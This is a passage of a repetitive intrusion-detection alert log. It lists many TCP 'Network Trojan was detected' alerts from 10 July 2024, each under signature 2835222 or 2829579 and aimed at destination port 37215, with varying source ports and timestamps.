                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.532375
                  SID:2835222
                  Source Port:33304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.929861
                  SID:2829579
                  Source Port:36806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.549796
                  SID:2835222
                  Source Port:60026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.469392
                  SID:2835222
                  Source Port:53598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.605681
                  SID:2829579
                  Source Port:46346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.590695
                  SID:2835222
                  Source Port:43852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.383866
                  SID:2829579
                  Source Port:38710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.383714
                  SID:2829579
                  Source Port:44944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.829838
                  SID:2835222
                  Source Port:50968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.300019
                  SID:2835222
                  Source Port:47730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.131322
                  SID:2829579
                  Source Port:60744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.503174
                  SID:2829579
                  Source Port:59100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.576536
                  SID:2835222
                  Source Port:49156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.435452
                  SID:2835222
                  Source Port:59518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.198321
                  SID:2829579
                  Source Port:37302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.217028
                  SID:2829579
                  Source Port:36614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.824053
                  SID:2829579
                  Source Port:51910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.922659
                  SID:2835222
                  Source Port:48132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.542620
                  SID:2829579
                  Source Port:36552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.959862
                  SID:2829579
                  Source Port:35128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.005706
                  SID:2835222
                  Source Port:47456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.176056
                  SID:2829579
                  Source Port:55308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.761946
                  SID:2829579
                  Source Port:55602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.850183
                  SID:2829579
                  Source Port:46054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.126836
                  SID:2835222
                  Source Port:38708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.009632
                  SID:2829579
                  Source Port:35198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.990112
                  SID:2829579
                  Source Port:38226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.612913
                  SID:2829579
                  Source Port:36854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761850
                  SID:2829579
                  Source Port:51460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.856940
                  SID:2835222
                  Source Port:52096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.766874
                  SID:2835222
                  Source Port:57728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.743404
                  SID:2835222
                  Source Port:48752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.165793
                  SID:2829579
                  Source Port:59300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.753198
                  SID:2829579
                  Source Port:44570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.074036
                  SID:2829579
                  Source Port:36170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.482479
                  SID:2835222
                  Source Port:49370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.865761
                  SID:2829579
                  Source Port:57906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.809017
                  SID:2829579
                  Source Port:39404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.720091
                  SID:2829579
                  Source Port:33214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.411489
                  SID:2835222
                  Source Port:41128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.071097
                  SID:2829579
                  Source Port:41312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.853545
                  SID:2829579
                  Source Port:36378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.130042
                  SID:2835222
                  Source Port:57150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.704112
                  SID:2835222
                  Source Port:53642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.597215
                  SID:2835222
                  Source Port:38992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.633014
                  SID:2835222
                  Source Port:50108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.468410
                  SID:2835222
                  Source Port:48504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.150290
                  SID:2829579
                  Source Port:42408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.418203
                  SID:2829579
                  Source Port:52674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.792052
                  SID:2835222
                  Source Port:44454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.211472
                  SID:2835222
                  Source Port:37682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.846786
                  SID:2835222
                  Source Port:46424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.827903
                  SID:2829579
                  Source Port:37426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.215395
                  SID:2835222
                  Source Port:35140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.593933
                  SID:2835222
                  Source Port:59676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.161140
                  SID:2829579
                  Source Port:41012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.209381
                  SID:2835222
                  Source Port:58764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.056962
                  SID:2829579
                  Source Port:51440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.033670
                  SID:2835222
                  Source Port:60156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.538222
                  SID:2835222
                  Source Port:49444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.298138
                  SID:2835222
                  Source Port:40044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.292595
                  SID:2829579
                  Source Port:58324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.914587
                  SID:2829579
                  Source Port:52646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.202562
                  SID:2835222
                  Source Port:56574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.205499
                  SID:2829579
                  Source Port:38062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835160
                  SID:2829579
                  Source Port:49088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.303627
                  SID:2829579
                  Source Port:36070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.506751
                  SID:2829579
                  Source Port:40642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.949781
                  SID:2835222
                  Source Port:40956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.819826
                  SID:2835222
                  Source Port:40874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.505741
                  SID:2829579
                  Source Port:40014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.837917
                  SID:2829579
                  Source Port:58010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.138827
                  SID:2829579
                  Source Port:49388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.980706
                  SID:2835222
                  Source Port:59752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.781247
                  SID:2835222
                  Source Port:36746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.703676
                  SID:2829579
                  Source Port:49344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.663652
                  SID:2835222
                  Source Port:38886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.446211
                  SID:2829579
                  Source Port:49164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.829856
                  SID:2835222
                  Source Port:51690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.549602
                  SID:2835222
                  Source Port:36908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.012833
                  SID:2835222
                  Source Port:51606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.174568
                  SID:2829579
                  Source Port:45692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.344917
                  SID:2829579
                  Source Port:34382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.010127
                  SID:2835222
                  Source Port:43878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.408073
                  SID:2835222
                  Source Port:36542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.673151
                  SID:2829579
                  Source Port:55004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.070223
                  SID:2829579
                  Source Port:39620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.840131
                  SID:2835222
                  Source Port:34134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.312425
                  SID:2835222
                  Source Port:33118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.155678
                  SID:2835222
                  Source Port:56256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.998303
                  SID:2835222
                  Source Port:55158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.420210
                  SID:2829579
                  Source Port:48740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.392562
                  SID:2835222
                  Source Port:37460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.023692
                  SID:2829579
                  Source Port:33716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.728066
                  SID:2829579
                  Source Port:52128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.986836
                  SID:2829579
                  Source Port:45892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.464589
                  SID:2829579
                  Source Port:59526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.942170
                  SID:2829579
                  Source Port:48838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.893458
                  SID:2835222
                  Source Port:39468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.330263
                  SID:2829579
                  Source Port:33534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.367348
                  SID:2835222
                  Source Port:54032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.181230
                  SID:2829579
                  Source Port:45196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.161010
                  SID:2829579
                  Source Port:38324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.318439
                  SID:2835222
                  Source Port:49482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.207243
                  SID:2829579
                  Source Port:49036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.818987
                  SID:2835222
                  Source Port:45632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.904188
                  SID:2835222
                  Source Port:39596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.961222
                  SID:2829579
                  Source Port:44850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.913134
                  SID:2835222
                  Source Port:60056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.873884
                  SID:2829579
                  Source Port:37008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.531536
                  SID:2835222
                  Source Port:45770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.726250
                  SID:2835222
                  Source Port:47540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.134906
                  SID:2835222
                  Source Port:43278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.808295
                  SID:2835222
                  Source Port:46338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.730501
                  SID:2829579
                  Source Port:33178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.591282
                  SID:2835222
                  Source Port:46202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.278007
                  SID:2835222
                  Source Port:46214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.553454
                  SID:2835222
                  Source Port:35858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.513537
                  SID:2829579
                  Source Port:49926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.440353
                  SID:2829579
                  Source Port:51880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.574269
                  SID:2829579
                  Source Port:58924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.930785
                  SID:2829579
                  Source Port:39654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.809992
                  SID:2829579
                  Source Port:47620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.524057
                  SID:2829579
                  Source Port:42608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.547528
                  SID:2829579
                  Source Port:55836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.597110
                  SID:2829579
                  Source Port:60222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.527046
                  SID:2829579
                  Source Port:53530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.910333
                  SID:2829579
                  Source Port:47346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.374811
                  SID:2835222
                  Source Port:58408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.401938
                  SID:2829579
                  Source Port:60774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.801295
                  SID:2835222
                  Source Port:50934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.058736
                  SID:2835222
                  Source Port:46834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.505876
                  SID:2829579
                  Source Port:55762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.547528
                  SID:2829579
                  Source Port:46082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.663651
                  SID:2835222
                  Source Port:48632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.446439
                  SID:2829579
                  Source Port:36204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.516215
                  SID:2829579
                  Source Port:39666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.477430
                  SID:2835222
                  Source Port:36440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.095355
                  SID:2829579
                  Source Port:39024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.782831
                  SID:2835222
                  Source Port:48064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.126957
                  SID:2829579
                  Source Port:54620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.879601
                  SID:2835222
                  Source Port:48770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.476492
                  SID:2829579
                  Source Port:39248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.985178
                  SID:2835222
                  Source Port:50932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.188180
                  SID:2829579
                  Source Port:37496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.388728
                  SID:2829579
                  Source Port:52904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.083120
                  SID:2829579
                  Source Port:48270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.027380
                  SID:2835222
                  Source Port:39882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.667281
                  SID:2835222
                  Source Port:55996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.637252
                  SID:2835222
                  Source Port:45528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.674109
                  SID:2835222
                  Source Port:37164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.619153
                  SID:2829579
                  Source Port:35436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.205776
                  SID:2829579
                  Source Port:47100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.895563
                  SID:2835222
                  Source Port:53402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.652707
                  SID:2835222
                  Source Port:42016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.490604
                  SID:2829579
                  Source Port:60922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.897778
                  SID:2835222
                  Source Port:37494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.094996
                  SID:2835222
                  Source Port:38652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.933936
                  SID:2835222
                  Source Port:41672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.385173
                  SID:2835222
                  Source Port:42746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.507249
                  SID:2835222
                  Source Port:43170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.933010
                  SID:2829579
                  Source Port:38102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.588104
                  SID:2829579
                  Source Port:47728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.425783
                  SID:2835222
                  Source Port:40004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.709807
                  SID:2829579
                  Source Port:44232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.611933
                  SID:2829579
                  Source Port:54534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.851676
                  SID:2829579
                  Source Port:35232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.053322
                  SID:2835222
                  Source Port:50570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.367944
                  SID:2835222
                  Source Port:34732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.815899
                  SID:2835222
                  Source Port:48700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.966434
                  SID:2829579
                  Source Port:38270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.809234
                  SID:2829579
                  Source Port:42950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.655987
                  SID:2835222
                  Source Port:48826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.661745
                  SID:2829579
                  Source Port:59474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.783603
                  SID:2829579
                  Source Port:58596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.034591
                  SID:2829579
                  Source Port:39158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.030888
                  SID:2829579
                  Source Port:45856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.785438
                  SID:2835222
                  Source Port:42806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.503966
                  SID:2835222
                  Source Port:46298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.015608
                  SID:2829579
                  Source Port:50970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.808876
                  SID:2835222
                  Source Port:53196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.105153
                  SID:2829579
                  Source Port:57774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.282897
                  SID:2829579
                  Source Port:53872
